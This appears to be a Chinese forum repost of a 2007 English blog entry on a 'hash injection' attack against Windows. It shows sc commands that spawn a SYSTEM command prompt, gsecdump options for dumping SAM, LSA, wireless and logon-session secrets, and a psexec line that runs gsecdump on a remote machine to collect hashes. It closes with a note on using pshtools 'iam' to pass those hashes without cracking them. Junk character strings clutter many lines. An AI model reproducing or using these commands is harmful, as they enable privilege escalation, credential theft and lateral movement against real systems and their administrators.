HASH注入式攻击

admin

o get a DOS Prompt as NT system:
) A) V% Z: V& \1 F/ ~& j/ w
- q. {3 n" S* L6 N5 g! P5 Z" n3 BC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
) K+ B* _9 k6 ]8 f7 E: n4 p[SC] CreateService SUCCESS
4 O7 V* b4 w0 y# j% Y* {
: D3 h/ I6 Y, v/ x, {# ^2 WC:\>sc start shellcmdline
- b; k, }  j/ Z[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.
8 c- x' n! h3 Q% ?! M% @5 D
C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
4 r* M+ \4 z" _
( i. }& h% g9 O- b' o------------
; }5 Y9 y1 M/ g2 K4 ?
; l* e! j& ^, Z( d3 S* l" JThen in the new DOS window:
2 K5 p1 V+ T# f0 A# V, ?
) Q& S6 T7 _0 d9 z$ Z1 h' WMicrosoft Windows XP [Version 5.1.2600]
% [& v  H" J0 a7 ]9 K(C) Copyright 1985-2001 Microsoft Corp.
* X" ?! L* ]- G. N8 C' H
C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

9 X4 k0 {, ^, |$ }6 f$ F" D7 EC:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
, j. h7 L. E; u; K: D-l [ --dump_lsa ] dump lsa secrets
3 }+ U7 ?( J  U# Y1 q9 v) \0 n-w [ --dump_wireless ] dump microsoft wireless connections
4 K/ b3 k7 d: ^' {7 b( e% N-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:
, n& J; w3 ~- A: F( r! J  V
PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
, e& P8 y. m3 e" t; I* xSysinternals - 链接标记[url]www.sysinternals.com[/url]
9 i. P' f7 G( H* n. h+ x2 C# a6 K
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

5 u2 L/ }2 }. P) f6 Eto get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
- a4 a! `- i+ }# \! Y
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

我看了下原文出处，貌似是/2007/03/16/郁闷啊，差距。
" Q6 c$ K" d, D! s) `